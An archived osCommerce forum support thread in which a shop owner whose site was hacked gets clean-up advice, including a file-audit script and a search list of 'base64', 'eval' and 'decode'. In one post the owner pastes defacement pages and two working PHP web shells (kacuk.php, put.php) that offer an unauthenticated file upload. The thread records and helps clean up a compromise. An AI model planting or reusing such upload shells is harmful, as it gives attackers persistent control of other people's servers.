
Error in a homepage


This topic has been archived. This means that you cannot reply to this topic.
27 replies to this topic

#1   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 13 March 2011 - 17:57

hello

I have a problem.

From one day to the next my website changed. Before, it worked fine. But now I see this message on the homepage and the admin:

homepage: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/index.php on line 35

admin: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/admin/index.php on line 26


----------------------------------------------

Line 35: <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

Line 26: <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">


Please help.

Thanks

I use version v2.2RC2a of osCommerce

#2   DunWeb

DunWeb

    The Censored One

  • Members
  • 13,084 posts

Posted 13 March 2011 - 18:58

Ariel,

Check your website for hacker activity. Hackers usually try to insert code at the top of the index.php files. Perhaps you can post the first 30 lines so we can see it.




Chris
:|: Was this post helpful ? Click the LIKE THIS button :|:

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

#3   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 13 March 2011 - 19:16

Thanks for replying

index.php of homepage:

<?php
/*
$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com

Copyright © 2003 osCommerce

Released under the GNU General Public License
*/

require('includes/application_top.php');

// the following cPath references come from application_top.php
$category_depth = 'top';
if (isset($cPath) && tep_not_null($cPath)) {
$categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
$cateqories_products = tep_db_fetch_array($categories_products_query);
if ($cateqories_products['total'] > 0) {
$category_depth = 'products'; // display products
} else {
$category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
$category_parent = tep_db_fetch_array($category_parent_query);
if ($category_parent['total'] > 0) {
$category_depth = 'nested'; // navigate through the categories
} else {
$category_depth = 'products'; // category has no products, but display the 'no products' message
}
}
}

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>


index.php of admin:


<?php
/*
$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com

Copyright © 2007 osCommerce

Released under the GNU General Public License
*/

require('includes/application_top.php');

$languages = tep_get_languages();
$languages_array = array();
$languages_selected = DEFAULT_LANGUAGE;
for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {
$languages_array[] = array('id' => $languages[$i]['code'],
'text' => $languages[$i]['name']);
if ($languages[$i]['directory'] == $language) {
$languages_selected = $languages[$i]['code'];
}
}

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>

#4   DunWeb

DunWeb

    The Censored One

  • Members
  • 13,084 posts

Posted 13 March 2011 - 19:29

Ariel,

Are you sure you didn't make recent changes to accommodate additional language support ?

In the index.php, this:

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>

Should be this:

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>


NOTE the ?> BEFORE the doctype line ? It is also missing in your /admin/index.php and the language code

$languages = tep_get_languages();
$languages_array = array();
$languages_selected = DEFAULT_LANGUAGE;
for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {
$languages_array[] = array('id' => $languages[$i]['code'],
'text' => $languages[$i]['name']);
if ($languages[$i]['directory'] == $language) {
$languages_selected = $languages[$i]['code'];
}
}

is not standard in the default download.




Chris

#5   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 13 March 2011 - 19:48

I didn't make any changes recently and I didn't touch anything.

I tried what you said and it didn't work.

Thanks

#6   DunWeb

DunWeb

    The Censored One

  • Members
  • 13,084 posts

Posted 13 March 2011 - 19:59

Ariel,

This is the first 37 lines from a default index.php file. Try it. Remember to back up before making any changes.

<?php
/*
$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com

Copyright © 2003 osCommerce

Released under the GNU General Public License
*/

require('includes/application_top.php');

// the following cPath references come from application_top.php
$category_depth = 'top';
if (isset($cPath) && tep_not_null($cPath)) {
$categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
$cateqories_products = tep_db_fetch_array($categories_products_query);
if ($cateqories_products['total'] > 0) {
$category_depth = 'products'; // display products
} else {
$category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
$category_parent = tep_db_fetch_array($category_parent_query);
if ($category_parent['total'] > 0) {
$category_depth = 'nested'; // navigate through the categories
} else {
$category_depth = 'products'; // category has no products, but display the 'no products' message
}
}
}

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>


Chris

#7   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 13 March 2011 - 20:22

DunWeb,

I have a backup of my website, but I wanted to see if someone had hacked my website

#8   DunWeb

DunWeb

    The Censored One

  • Members
  • 13,084 posts

Posted 13 March 2011 - 21:01

It is hard to say if the site has been compromised based on the little information you have given and without seeing the URL. However, if you did not make the changes to the index.php and /admin/index.php then there has been some unauthorized activity.



Chris

#9   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 13 March 2011 - 21:27

Url:
www.videoclublasflores.com.ar


Thanks for all

#10   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 14 March 2011 - 00:28

The web page remains the same; I do not know what to do.

#11   germ

germ
  • Members
  • 13,921 posts

Posted 14 March 2011 - 16:36

You have hack files all over in the images folder.
:o

Visit the link below:

How to Secure Your Site

Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable.
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."
- Me -

"Headers already sent" - The definitive help

"Cannot redeclare ..." - How to find/fix it

SSL Implementation Help

Like this post? "Like" it again over there >

#12   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 14 March 2011 - 18:09

Recently I started to look at the images folder and I found this (as you said):

ina.htm: HACKED BY <h4> <center> kaMtiEz </ h4> </ center> <center> <h4> <br> INDONESIANCODER TEAM @ 2010 </ h4> </ center>

indonesia.htm: <html><head>
<title>Hacker Indonesia</title><style type="text/css">
html, body {
color: white;
background-color: #000080;
}

a {
background-color: transparent;
color: #ffffff;
}

#p404 {
position: absolute;
top: 20%;
left: 0px;
width: 100%;
height: 1px;
overflow: visible;
visibility: visible;
display: block;
}

#content {
margin-left: -320px;
position: absolute;
top: -100px;
left: 50%;
width: 640px;
height: 200px;
visibility: visible;
}

#errormessage {
font: 50px garamond;
line-height: 200%;
text-align: center;
}

#title, #footer {
text-align: center;
}

#title span {
background-color: #c0c0c0;
color: #000080;
}
</style><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"></head><body>
<div id="p404">
<div id="content">
<div id="errormessage">
<p>Hacked by Hmei7</p>
</p>
</div>
</div>
</div>
</body></html>

kacuk.php: ==kacuk

<?php echo '<br><br>'.php_uname().'<br>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'File Uploaded!<br><br>'; } else { echo 'File Upload, Failed!<br><br>'; } } ?>

==

x.htm: <b><font size="5">by iskorpitx</font></b>


(I'm not sure)
put.php: <?php

echo '<b>The KabuS<br><br>'.php_uname().'<br></b>';

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }

else { echo '<b>Upload Fail !!!</b><br><br>'; }

}

?>

----------------------------------


I'll keep the advice you gave me on "Securing the ADMIN".
But can I get my website back as it was before?
What should I do?

#13   DunWeb

DunWeb

    The Censored One

  • Members
  • 13,084 posts

Posted 14 March 2011 - 18:10

Ariel,

Follow these steps to clean and secure your website:

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hacker's code.

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.

3) Delete the files on your hosting account before uploading the clean files.

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

10) [Removed].



Chris

Edited by Jan Zonjee, 14 March 2011 - 21:18.


#14   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 15 March 2011 - 02:03

I deleted these files from the images folder:

ina.htm
indonesia.htm
kacuk.php
x.htm
put.php


In point 2, where you asked me to find these keywords:
eval base64 decode

Those words were found in a few files called:
googleff7fe2850f15ebd7.php
googlebc44d7671aae3b3e.php
google7a14fb0c01e4e5d1.php

What should I do?

#15   germ

germ
  • Members
  • 13,921 posts

Posted 15 March 2011 - 03:09

Those are all hack files.

It's not normal on 99.99% (or more) installs to have ANY php files in the images folder.

Unless you purposely put a php file in the images folder and you know exactly what it does I'd remove any and all php files from the images folder.
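Added example (not posted by anyone in this thread and not osCommerce code): a Python sketch of the checks from steps 2 and 6 of the clean-up list in #13 and the "no PHP in the images folder" rule from #15, run over one copy of the shop. The function names, the `PHP_EXT` list and the sample tree are assumptions made for the example; file modes only mean something when it runs on the hosting account, since a copy pulled to a Windows machine over FTP does not keep them.

```python
import os
import re
import stat
import tempfile

# Keywords from step 2 of the list above, matched case-insensitively as bytes.
KEYWORDS = re.compile(rb"base64|eval|decode", re.IGNORECASE)
MAX_DIR, MAX_FILE, MAX_CONFIGURE = 0o755, 0o644, 0o444  # limits from step 6
PHP_EXT = (".php", ".phtml")  # assumption: extensions the server runs as PHP


def exceeds(mode, limit):
    """True if mode grants any permission bit that limit does not."""
    return bool(stat.S_IMODE(mode) & ~limit)


def audit(root):
    """Return sorted (relative path, finding) pairs for one copy of the shop."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if exceeds(os.stat(dirpath).st_mode, MAX_DIR):
            findings.append((rel_dir, "directory mode above 755"))
        in_images = "images" in rel_dir.split(os.sep)
        for name in files:
            path = os.path.join(dirpath, name)
            if not os.path.isfile(path):  # skip broken links, sockets, etc.
                continue
            rel = os.path.normpath(os.path.join(rel_dir, name))
            limit = MAX_CONFIGURE if name == "configure.php" else MAX_FILE
            if exceeds(os.stat(path).st_mode, limit):
                findings.append((rel, "file mode above %o" % limit))
            if in_images and name.lower().endswith(PHP_EXT):
                findings.append((rel, "PHP file in images folder"))
            with open(path, "rb") as fh:
                hits = {m.lower().decode() for m in KEYWORDS.findall(fh.read())}
            if hits:
                findings.append((rel, "keywords: " + ",".join(sorted(hits))))
    return sorted(findings)


def build_sample(root):
    """Write a small constructed tree (not real site data) for the demo."""
    sample = {
        "index.php": (b"<?php require('includes/application_top.php'); ?>", 0o644),
        "includes/configure.php": (b"<?php // constructed settings ?>", 0o644),
        "images/logo.gif": (b"GIF89a constructed", 0o644),
        "images/kacuk.php": (b"<?php // constructed: eval(base64_decode()) ?>", 0o666),
    }
    for rel, (data, mode) in sample.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)
    for sub, mode in (("includes", 0o755), ("images", 0o777)):
        os.chmod(os.path.join(root, sub), mode)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for path, finding in audit(tmp):
            print(path, "->", finding)
```

Keyword hits are candidates for manual review, not verdicts: stock PHP code also calls functions whose names contain "decode", so each hit has to be read in context before a file is deleted.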

#16   DunWeb

DunWeb

    The Censored One

  • Members
  • 13,084 posts

Posted 15 March 2011 - 04:33

Jan,

I see you edited #13 post. Please explain where in the forum policies it says I can not invite other members to PM me for additional help ? I have read the forum policies AGAIN, and could not find anything to suggest that I have broken any rules.



For the record, here is #10 on the list again:

10) If you feel you can not perform any of the above steps, PM me for help, because if you miss any of these steps your site may remain accessible to the hacker.


I welcome your response here in the forum, so everyone can see it.



Chris

#17   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 15 March 2011 - 07:45

I deleted these files and tomorrow I will download version 2.2 to correct the two index.php files.

Thanks

I hope it works

Edited by Racing Club, 15 March 2011 - 07:54.


#18   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 16 March 2011 - 06:10

At the footer of the index.php I found this:


I already removed it and now I'm adding this:
?>
because it is missing several lines.

I'll report how I progress.

Thanks!

I was slow to respond because I spent the whole afternoon removing a virus in my computer

Edited by Racing Club, 16 March 2011 - 06:16.


#19   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 16 March 2011 - 07:06

I am done!
Now when I go to my website or the admin, the page goes blank.

I see when loading Internet Explorer other addresses down

Thanks!

#20   Racing Club

Racing Club
  • Members
  • 17 posts

Posted 17 March 2011 - 06:10

please help!

Thanks!